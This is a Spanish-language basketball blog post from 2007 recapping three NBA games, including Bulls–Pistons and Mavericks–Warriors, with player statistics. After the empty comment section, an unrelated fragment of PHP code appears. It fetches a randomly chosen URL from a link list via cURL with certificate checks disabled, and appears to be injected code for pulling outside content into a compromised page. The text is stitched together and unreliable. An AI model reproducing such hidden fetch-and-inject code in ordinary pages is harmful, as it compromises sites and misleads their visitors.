La crónica (8/11/07)

09 de November de 2007 por MagicJohnson32

bensheedEl jueves nos dejó tres partidos de auténtico sabor a Playoffs, tanto por los equipos que los disputaron como por la igualdad y la intensidad que se vivió en ellos. Mavericks, Nets y (¡al fin!) Bulls salieron victoriosos ante Warriors (ojo: 0-5), Wizards y Pistons respectivamente. Los mejores de la noche fueron, curiosamente, dos de los perdedores: Baron Davis y Rasheed Wallace.

 

Vamos con los detalles de la pasada madrugada, nuestra crónica:

  • Tyrus da la primera victoria

benfive

 

Los Bulls necesitaron la motivación de la visita de los Pistons para lograr su primer triunfo de la temporada tras cuatro derrotas. Tyrus Thomas, con 19 puntos, 8 de 12 en tiros, y 14 rebotes, lideró el triunfo ante el equipo que eliminó a Chicago en los pasados Playoffs. El nombre del partido fue, sin embargo, Rasheed Wallace, que logró su mejor marca anotadora desde que llegó a los Pistons: 36 puntos, con 12 de 24 en tiros, a los que añadió 9 rebotes. Pero Sheed no contó con demasiada colaboración, ni siquiera con la suya propia: falló dos tiros en los últimos 35 segundos, y Hamilton tampoco pudo anotar el triple final para empatar el partido.

  • El hambre y las ganas de comer

rjeff

 

Wizards 85 – Nets 87

 

Los Nets funcionan; los Wizards, no. Anoche el partido entre ambos equipos sólo pudo acabar así, con la cuarta victoria de los de New Jersey y la cuarta derrota de los de Washington. Los mejores fueron los de siempre: Jefferson, Carter y Kidd (pese a anotar sólo seis punto) por un lado y Arenas, Butler y Jamison por el otro. De entre ellos, el jugador clave fue, otra vez, Richard Jefferson, que además de liderar a los suyos con 25 puntos, atrapó un rebote ofensivo y anotó dos tiros libres que dieron la victoria a los Nets.

  • Con unos meses de retraso

averyoracle

 

Mavs 120 – Warriors 115

 

Dallas y Golden State revivieron la serie de primera ronda de los pasados Playoffs, sólo que esta vez ganaron los Mavericks. Con cuatro jugadores por encima de 20 puntos, Nowitzki, Howard, Terry y Harris, y un triple de Stackhouse a 37 segundos para el final, Dallas vengó la humillante eliminación ante los Warriors. Baron Davis estuvo muy cerca de volver a hacer el milagro: 37 puntos con 14 de 26 en tiros, más 5 rebotes y 5 asistencias logró el base californiano, quien, sin embargo, tuvo en sus manos el triple que pudo haber mandado el partido a la prórroga. Pero falló y los Warriors se ven con un balance de cinco derrotas en cinco partidos. Azubuike logró 27 puntos con 10 de 20 en tiros, más 11 rebotes y 4 asistencias, y Al Harrington aportó otros 20. Pero los Warriors pagaron su cortísima rotación, especialmente por la ausencia de Stephen Jackson, fundamental en la eliminación de los Mavs en los pasados Playoffs.

 

harrisbarnes

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>